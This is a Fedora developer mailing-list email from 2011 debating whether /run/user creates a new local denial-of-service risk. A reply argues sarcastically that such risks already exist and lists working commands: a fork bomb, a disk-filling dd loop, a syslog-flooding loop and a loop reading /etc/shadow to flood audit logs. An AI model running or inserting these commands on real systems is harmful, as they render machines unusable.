2011/5/9 Michał Piotrowski <mkkp4x4@xxxxxxxxx>
>
> 2011/5/10 Lennart Poettering <mzerqung@xxxxxxxxxxx>:
> > On Mon, 09.05.11 23:54, Michał Piotrowski (mkkp4x4@xxxxxxxxx) wrote:
> >> No, only for /run/user/ - because there is a simple workaround that
> >> can be used on affected systems if the administrator considers his
> >> system as vulnerable for malicious users.
> >
> > Again, we had /dev/shm for years on Linux. This weakness in the security
> > model is not news, not at all.
>
> Yes, but /run/user is a new thing and it gives wonderful opportunity
> to DoS services for all system users. Thats my POV. And my POV is that
> it should be documented - users should be aware about this. Also FPL
> agreed with my arguments.
>
> That's all. If you do not agree with that, then I'm giving up :)
>
Let's make this simple:
FAQ: How can I make my system unusable? How can I create a denial of service?
Answer: On default systems there are multiple ways to do this, please
choose one or more of the following:
a) Denial of CPU. The Fork Bomb is the standard way to kill a system:
In a shell type the following:
:(){ :|: & };:
perl -e 'fork while fork'
b) Denial of Filesystem. There are several ways of doing this. Usually
it can be done quickly by the following:
dd if=/dev/zero of=<filename>
is a standard, but easily fixed by deleting one file. Adding some
flare you can great randomly created files in multiple places.
Places of entry where a system can cause problems are the following:
/tmp/
/var/tmp/
/dev/shmem/
/run/file/
c) Denial of Logs
while true; do
logger $( dd if=/dev/urandom count=1 bs=128 2> /dev/null |tr -dC
'[:print:]' )
done
d) Denial of service via audits
while true; do
cat /etc/shadow
done
Doing a, b, c, and d at the same time is always fun for the family.
There are many other ways you as a user can cause problems to your own
system...
--
Stephen J Smoogen.
"The core skill of innovators is error recovery, not failure avoidance."
Randy Nelson, President of Pixar University.
"Let us be kind, one to another, for most of us are fighting a hard
battle." -- Ian MacLaren
--
devel mailing list
devel@xxxxxxxxxxxxxxxxxxxxxxx
https://admin.fedoraproject.org/mailman/listinfo/devel
